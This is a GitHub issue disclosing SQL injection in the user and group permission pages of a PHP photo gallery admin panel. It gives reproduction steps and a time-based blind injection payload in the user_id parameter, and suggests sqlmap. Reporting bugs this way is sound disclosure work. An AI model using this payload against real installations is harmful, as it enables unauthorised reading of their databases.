Skip to content

SQL injection in user/group permissions manager #1011

Closed
@zongdeiqianxing

Description

hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php

1 :
request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
image
image
image
image

2:
same as the first, request /admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
image
image
image
image

Metadata

Assignees

Type

No type

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions